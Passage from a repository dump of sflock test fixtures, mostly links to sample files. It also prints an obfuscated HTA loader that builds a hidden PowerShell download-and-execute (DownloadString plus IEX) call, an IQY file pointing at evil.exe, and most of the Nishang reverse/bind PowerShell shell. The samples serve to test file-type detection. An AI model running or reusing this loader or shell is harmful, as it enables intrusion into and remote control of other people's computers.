13 | NNNNNNNNNNNNNNNNNNNNNNNNN = "$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');"
14 | KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK ="$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');"
15 | EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE = "$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');"
16 | RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR = HHHHHHHHHHHHHHHHHHHHHHH+BBBBBBBBBBBBBBBBBBBBBBBB+AAAAAAAAAAAAAAAAAAAAAAA+NNNNNNNNNNNNNNNNNNNNNNNNN++KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK+EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE+""
17 | HBANKERS.Run RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR,0
18 | self.close
19 | </script>
20 | <body>
21 | HBAR
22 | </body>
23 | </HEAD>
24 | </HTML>
25 | 


--------------------------------------------------------------------------------
/tests/files/extension/hta/ca2ad785528c4f41bbc8dd5c261c5aa37d3de6ce1708f9e7b2c78d006d39882f:
--------------------------------------------------------------------------------
 1 | <head>
 2 | <title>HTA Test</title>
 3 | <HTA:APPLICATION 
 4 |      APPLICATIONNAME="HTA Test"
 5 |      SCROLL="yes"
 6 |      SINGLEINSTANCE="yes"
 7 |      WINDOWSTATE="maximize"
 8 | >
 9 | </head>
10 | 
11 | <script language="VBScript">
12 |     Sub TestSub
13 |         Msgbox "Testing 1-2-3."
14 |     End Sub
15 | </script>
16 | 
17 | <body>
18 | <input type="button" value="Run Script" name="run_button"  onClick="TestSub"><p> 
19 | 
20 | </body>
21 | 


--------------------------------------------------------------------------------
/tests/files/extension/html/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/html/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/html/ea2feebdffe91ce6e5a1b429c6cce29f43771a2722ab3d391cd031ed9c2f8f95:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 
 3 | <head>
 4 | <META HTTP-EQUIV="Refresh" content= "2;URL=http://www.fastseo.io/">
 5 | </head>
 6 | 
 7 | <p><font face="Verdana">Loading <b><a href="http://www.fastseo.io/">Full Details</a> </b></font></p>
 8 | </html>
 9 | 
10 | 


--------------------------------------------------------------------------------
/tests/files/extension/hwp/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/hwp/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/hwp/0d56c5f20b2da3659f05d613d3faeb41d9e82a45e9161c3b48805ebb7b2730b9:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/hwp/0d56c5f20b2da3659f05d613d3faeb41d9e82a45e9161c3b48805ebb7b2730b9


--------------------------------------------------------------------------------
/tests/files/extension/hwp/cfc47838f03f5054ae47c5b1de27883b312d0cb14ee543b772e43fcc0b460c9f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/hwp/cfc47838f03f5054ae47c5b1de27883b312d0cb14ee543b772e43fcc0b460c9f


--------------------------------------------------------------------------------
/tests/files/extension/iqy/22b97953b1cf40b461d8e8df62e0b6e31a44986a2dd1a62d8529ae68b4d82edd:
--------------------------------------------------------------------------------
 1 | WEB
 2 | 1
 3 | http://localhost/evil.exe
 4 | 2
 5 | a
 6 | 3
 7 | b
 8 | 4
 9 | c
10 | 5


--------------------------------------------------------------------------------
/tests/files/extension/iso/9c13659b6440cc24133fc3b89696921839f5197e18ac2edd04fa605edb026bcf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/iso/9c13659b6440cc24133fc3b89696921839f5197e18ac2edd04fa605edb026bcf


--------------------------------------------------------------------------------
/tests/files/extension/iso/adc63e6114f6fc3c90f48edf7602812fd3191dbfd8263d90ba9166d3409619ec:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/iso/adc63e6114f6fc3c90f48edf7602812fd3191dbfd8263d90ba9166d3409619ec


--------------------------------------------------------------------------------
/tests/files/extension/iso/f303cdea6a123ce4501449936c7c809f855a2d32d3d17cc2630390df2f588d07:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/iso/f303cdea6a123ce4501449936c7c809f855a2d32d3d17cc2630390df2f588d07


--------------------------------------------------------------------------------
/tests/files/extension/jar/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/jar/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/jar/53bcd9a9ca4f93bc7de61a3458f2c2ed95745ad1341d491bf03939b00504fcf2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/jar/53bcd9a9ca4f93bc7de61a3458f2c2ed95745ad1341d491bf03939b00504fcf2


--------------------------------------------------------------------------------
/tests/files/extension/jar/8dfc59f75cb74edfefbb77caf5b383cd2143b04469ee6c5ee9bbd0fde2363271:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/jar/8dfc59f75cb74edfefbb77caf5b383cd2143b04469ee6c5ee9bbd0fde2363271


--------------------------------------------------------------------------------
/tests/files/extension/js/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/js/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/js/a3e41fa2fe47067bd545c98a4283abe58880cb2d17457c1aa6b00bee2b3d7188:
--------------------------------------------------------------------------------
 1 | function greet(name) {
 2 |     return "Hello " + name;
 3 | }
 4 | 
 5 | var who = "World";
 6 | console.log(greet(who));
 7 | 
 8 | var show = false;
 9 | if (show) {
10 |     alert(greet(who));
11 |     eval(1 + true);
12 | }
13 | 


--------------------------------------------------------------------------------
/tests/files/extension/lnk/062e1b2d15530911ed0d9bd09f072c788acbfcadaeb84e346eadba2921b6827c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/062e1b2d15530911ed0d9bd09f072c788acbfcadaeb84e346eadba2921b6827c


--------------------------------------------------------------------------------
/tests/files/extension/lnk/0c26f76c3816a52fbd90de0bf0892c9472a5f056e4ed9793b8b68fd11033adba:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/0c26f76c3816a52fbd90de0bf0892c9472a5f056e4ed9793b8b68fd11033adba


--------------------------------------------------------------------------------
/tests/files/extension/lnk/15d0bcf0af2c27743ba1b7d219fe20c12a4e21b561acfe8cce2261b8b2beadbb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/15d0bcf0af2c27743ba1b7d219fe20c12a4e21b561acfe8cce2261b8b2beadbb


--------------------------------------------------------------------------------
/tests/files/extension/lnk/23497bfd1d2abc332f94fbfb26aa20fd0a7106bc41635763c213cb1f35fa7084:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/23497bfd1d2abc332f94fbfb26aa20fd0a7106bc41635763c213cb1f35fa7084


--------------------------------------------------------------------------------
/tests/files/extension/lnk/26d0ac7627f7fe3e417516e0e1b695b82cd83a6d95fc988481672ab9f2fb0f7b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/26d0ac7627f7fe3e417516e0e1b695b82cd83a6d95fc988481672ab9f2fb0f7b


--------------------------------------------------------------------------------
/tests/files/extension/lnk/2fbf9d271dd942ff3d1b6e171503b1e9907296a02a7a6efb238ce83774fe8192:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/2fbf9d271dd942ff3d1b6e171503b1e9907296a02a7a6efb238ce83774fe8192


--------------------------------------------------------------------------------
/tests/files/extension/lnk/30fdbbf58cc153d1507b088a299d37bd8f70433accea9003b7a5ef72606153f9:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/30fdbbf58cc153d1507b088a299d37bd8f70433accea9003b7a5ef72606153f9


--------------------------------------------------------------------------------
/tests/files/extension/lnk/3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5


--------------------------------------------------------------------------------
/tests/files/extension/lnk/59d2882c4e2380f4e06a5ded77f70c81d55fa209a0239a2ef851b938634b424a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/59d2882c4e2380f4e06a5ded77f70c81d55fa209a0239a2ef851b938634b424a


--------------------------------------------------------------------------------
/tests/files/extension/lnk/629b0c9dd99386fd786edb8c3af0a6ccf8d948ae83f936c6991b439a5da08b6e:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/629b0c9dd99386fd786edb8c3af0a6ccf8d948ae83f936c6991b439a5da08b6e


--------------------------------------------------------------------------------
/tests/files/extension/lnk/677505fd0b5e420613215ed6d89f3e011adc06b02751603e8fae439086d27000:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/677505fd0b5e420613215ed6d89f3e011adc06b02751603e8fae439086d27000


--------------------------------------------------------------------------------
/tests/files/extension/lnk/8f4bc2518baa580ca3aec191fb2fbe7ec087b6b6bc722e54abe3249ed85c9e4b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/8f4bc2518baa580ca3aec191fb2fbe7ec087b6b6bc722e54abe3249ed85c9e4b


--------------------------------------------------------------------------------
/tests/files/extension/lnk/b8ece555ef8ccfb558efdac4cd3496c1ba365cfeea96506e094e5744a8470c8f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/b8ece555ef8ccfb558efdac4cd3496c1ba365cfeea96506e094e5744a8470c8f


--------------------------------------------------------------------------------
/tests/files/extension/lnk/d5ae39e8e3116bf0a5e0006b238ed5043b41f10e1d681f4266ac8a7974dbd879:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/d5ae39e8e3116bf0a5e0006b238ed5043b41f10e1d681f4266ac8a7974dbd879


--------------------------------------------------------------------------------
/tests/files/extension/lnk/dae5a67843f02bdeaadc71f28e321d7d94edc9a0d8d5a7fd0ee6250a9d47aeab:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/dae5a67843f02bdeaadc71f28e321d7d94edc9a0d8d5a7fd0ee6250a9d47aeab


--------------------------------------------------------------------------------
/tests/files/extension/lnk/db140c1c811d21763a78f6db66ed3df8bb1f95bd6bcf1f2e917dcdcd6f6241fc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/db140c1c811d21763a78f6db66ed3df8bb1f95bd6bcf1f2e917dcdcd6f6241fc


--------------------------------------------------------------------------------
/tests/files/extension/lnk/ec2e2e5f27620cb113f52ad4a5d28b5d249ca80ba6de323c91b90bd57c54279c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/ec2e2e5f27620cb113f52ad4a5d28b5d249ca80ba6de323c91b90bd57c54279c


--------------------------------------------------------------------------------
/tests/files/extension/lnk/ee2d8c153e44bb6a7ecacc3ba68b5bafc8e82972d2d1a1c7c49a0413ed684ddf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/lnk/ee2d8c153e44bb6a7ecacc3ba68b5bafc8e82972d2d1a1c7c49a0413ed684ddf


--------------------------------------------------------------------------------
/tests/files/extension/msg/002268de5c7110e8ca332bce3c9863af3ebba5ed1fe77e8ef36ae9dfd2015f1b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msg/002268de5c7110e8ca332bce3c9863af3ebba5ed1fe77e8ef36ae9dfd2015f1b


--------------------------------------------------------------------------------
/tests/files/extension/msg/56823b8d575798740da121c88d5c6e4b719f7929d6aa389ab204ad106abf53b7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msg/56823b8d575798740da121c88d5c6e4b719f7929d6aa389ab204ad106abf53b7


--------------------------------------------------------------------------------
/tests/files/extension/msg/94f137d8c1f1e3e8dc40d186bcacc0ac2731177364b7e9ee17a3f374fae65948:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msg/94f137d8c1f1e3e8dc40d186bcacc0ac2731177364b7e9ee17a3f374fae65948


--------------------------------------------------------------------------------
/tests/files/extension/msg/a79b7fd34907c49c0808bee82f29705cb97619f1c473377ba56d385909a48f16:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msg/a79b7fd34907c49c0808bee82f29705cb97619f1c473377ba56d385909a48f16


--------------------------------------------------------------------------------
/tests/files/extension/msi/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msi/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/msi/5aa41c7e3160dca492317182e2cf5ad947e91457b5d4a39fc5d7aabcc0c9dd8c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msi/5aa41c7e3160dca492317182e2cf5ad947e91457b5d4a39fc5d7aabcc0c9dd8c


--------------------------------------------------------------------------------
/tests/files/extension/msi/82cf474020d187ed9f4528387a80e81120c3910ae43abc2d9aa486d7d53c5677:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/msi/82cf474020d187ed9f4528387a80e81120c3910ae43abc2d9aa486d7d53c5677


--------------------------------------------------------------------------------
/tests/files/extension/ods/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ods/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/ods/e5fc9b97898531de8ea88a10df824a895ba3c9c31c9aeb8359025c36949a3aee:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ods/e5fc9b97898531de8ea88a10df824a895ba3c9c31c9aeb8359025c36949a3aee


--------------------------------------------------------------------------------
/tests/files/extension/odt/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/odt/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/odt/cf0f76e068915d2bf069e78b9cb2083db37fbd85747f9648f7bf3bfda57b8e2a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/odt/cf0f76e068915d2bf069e78b9cb2083db37fbd85747f9648f7bf3bfda57b8e2a


--------------------------------------------------------------------------------
/tests/files/extension/pdf/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pdf/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/pdf/a9e5ae4c3a25c578fb5b1ace4227ecc3b3ae4436acf4103a9d4bcdc1cf93a92b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pdf/a9e5ae4c3a25c578fb5b1ace4227ecc3b3ae4436acf4103a9d4bcdc1cf93a92b


--------------------------------------------------------------------------------
/tests/files/extension/pdf/ab659b26577b6ba70e67b3fa3f18714639894ff2190ede5fc0adb3fd1fd24a66:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pdf/ab659b26577b6ba70e67b3fa3f18714639894ff2190ede5fc0adb3fd1fd24a66


--------------------------------------------------------------------------------
/tests/files/extension/pdf/fff0587b2c63cbe23387f03c45a485a88052fd78410edbb2c17482be9a1fdbeb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pdf/fff0587b2c63cbe23387f03c45a485a88052fd78410edbb2c17482be9a1fdbeb


--------------------------------------------------------------------------------
/tests/files/extension/ppsm/15d976d97fd6489165bf574a3170fa72f0462eb31ed9fb21633e4c7bb80f35c4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppsm/15d976d97fd6489165bf574a3170fa72f0462eb31ed9fb21633e4c7bb80f35c4


--------------------------------------------------------------------------------
/tests/files/extension/ppsx/02f1f646b1204c07eb900566a90d8edd4c0f9ebd559bfb9ec2484e885ba58f83:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppsx/02f1f646b1204c07eb900566a90d8edd4c0f9ebd559bfb9ec2484e885ba58f83


--------------------------------------------------------------------------------
/tests/files/extension/ppsx/0ece537f3f6de0076ac5eb565629177c33b9c1318bb41279993970401018d5bc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppsx/0ece537f3f6de0076ac5eb565629177c33b9c1318bb41279993970401018d5bc


--------------------------------------------------------------------------------
/tests/files/extension/ppsx/33a200ee9823322bf4abcd6a3747485c3926a0f8aef8318f0c685396976d9d16:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppsx/33a200ee9823322bf4abcd6a3747485c3926a0f8aef8318f0c685396976d9d16


--------------------------------------------------------------------------------
/tests/files/extension/ppt/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppt/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/ppt/698a95e8fb79943bad9f5450ddc31d979aa9ce702eae9a5f40ff3fd24c6707cf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppt/698a95e8fb79943bad9f5450ddc31d979aa9ce702eae9a5f40ff3fd24c6707cf


--------------------------------------------------------------------------------
/tests/files/extension/ppt/c106a0d1bea84d713316a3bb1fd8ed3f8ac2316ad02aba0893d8734963f76cb9:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/ppt/c106a0d1bea84d713316a3bb1fd8ed3f8ac2316ad02aba0893d8734963f76cb9


--------------------------------------------------------------------------------
/tests/files/extension/pptm/16eacaeb506a74cb3fcef8578c6c256b263ac6e3fdcf481f73d52ad39eccb698:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pptm/16eacaeb506a74cb3fcef8578c6c256b263ac6e3fdcf481f73d52ad39eccb698


--------------------------------------------------------------------------------
/tests/files/extension/pptm/216cb6e868960187c63a700ee6018297e7bbf1af8dab778ec452d6b15546300f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pptm/216cb6e868960187c63a700ee6018297e7bbf1af8dab778ec452d6b15546300f


--------------------------------------------------------------------------------
/tests/files/extension/pptx/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pptx/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/pptx/a8119bd3a9fe8245db24a512105d6f3309cd858b7c7c82de1e6ebaa43f857a87:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pptx/a8119bd3a9fe8245db24a512105d6f3309cd858b7c7c82de1e6ebaa43f857a87


--------------------------------------------------------------------------------
/tests/files/extension/pptx/c2b8d3d8ca5ffb9fcc540c711ce89fcb1115bc7f610843f6ae5d0a9ec773220a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/pptx/c2b8d3d8ca5ffb9fcc540c711ce89fcb1115bc7f610843f6ae5d0a9ec773220a


--------------------------------------------------------------------------------
/tests/files/extension/ps1/0f1e223eaf8b6d71f65960f8b9e14c98ba62e585334a6349bcd02216f4415868:
--------------------------------------------------------------------------------
  1 | function Invoke-PowerShellTcp 
  2 | { 
  3 | <#
  4 | .SYNOPSIS
  5 | Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. 
  6 | 
  7 | .DESCRIPTION
  8 | This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. 
  9 | Also, a standard netcat can connect to this script Bind to a specific port.
 10 | 
 11 | The script is derived from Powerfun written by Ben Turner & Dave Hardy
 12 | 
 13 | .PARAMETER IPAddress
 14 | The IP address to connect to when using the -Reverse switch.
 15 | 
 16 | .PARAMETER Port
 17 | The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
 18 | 
 19 | .EXAMPLE
 20 | PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
 21 | 
 22 | Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 
 23 | the given IP and port. 
 24 | 
 25 | .EXAMPLE
 26 | PS > Invoke-PowerShellTcp -Bind -Port 4444
 27 | 
 28 | Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. 
 29 | 
 30 | .EXAMPLE
 31 | PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
 32 | 
 33 | Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
 34 | listening on the given IP and port. 
 35 | 
 36 | .LINK
 37 | http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
 38 | https://github.com/nettitude/powershell/blob/master/powerfun.ps1
 39 | https://github.com/samratashok/nishang
 40 | #>      
 41 |     [CmdletBinding(DefaultParameterSetName="reverse")] Param(
 42 | 
 43 |         [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
 44 |         [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
 45 |         [String]
 46 |         $IPAddress,
 47 | 
 48 |         [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
 49 |         [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
 50 |         [Int]
 51 |         $Port,
 52 | 
 53 |         [Parameter(ParameterSetName="reverse")]
 54 |         [Switch]
 55 |         $Reverse,
 56 | 
 57 |         [Parameter(ParameterSetName="bind")]
 58 |         [Switch]
 59 |         $Bind
 60 | 
 61 |     )
 62 | 
 63 |     
 64 |     try 
 65 |     {
 66 |         #Connect back if the reverse switch is used.
 67 |         if ($Reverse)
 68 |         {
 69 |             $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
 70 |         }
 71 | 
 72 |         #Bind to the provided port if Bind switch is used.
 73 |         if ($Bind)
 74 |         {
 75 |             $listener = [System.Net.Sockets.TcpListener]$Port
 76 |             $listener.start()    
 77 |             $client = $listener.AcceptTcpClient()
 78 |         } 
 79 | 
 80 |         $stream = $client.GetStream()
 81 |         [byte[]]$bytes = 0..65535|%{0}
 82 | 
 83 |         #Send back current username and computername
 84 |         $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
 85 |         $stream.Write($sendbytes,0,$sendbytes.Length)
 86 | 
 87 |         #Show an interactive PowerShell prompt
 88 |         $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
 89 |         $stream.Write($sendbytes,0,$sendbytes.Length)
 90 | 
 91 |         while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
 92 |         {
 93 |             $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
 94 |             $data = $EncodedText.GetString($bytes,0, $i)
 95 |             try
 96 |             {
 97 |                 #Execute the command on the target.
 98 |                 $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
 99 |             }
100 |             catch
101 |             {
102 |                 Write-Warning "Something went wrong with execution of command on the target." 
103 |                 Write-Error $_
104 |             }
105 |             $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
106 |             $x = ($error[0] | Out-String)
107 |             $error.clear()
108 |             $sendback2 = $sendback2 + $x
109 | 
110 |             #Return the results
111 |             $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
112 |             $stream.Write($sendbyte,0,$sendbyte.Length)
113 |             $stream.Flush()  
114 |         }
115 |         $client.Close()
116 |         if ($listener)
117 |         {
118 |             $listener.Stop()
119 |         }
120 |     }
121 |     catch
122 |     {
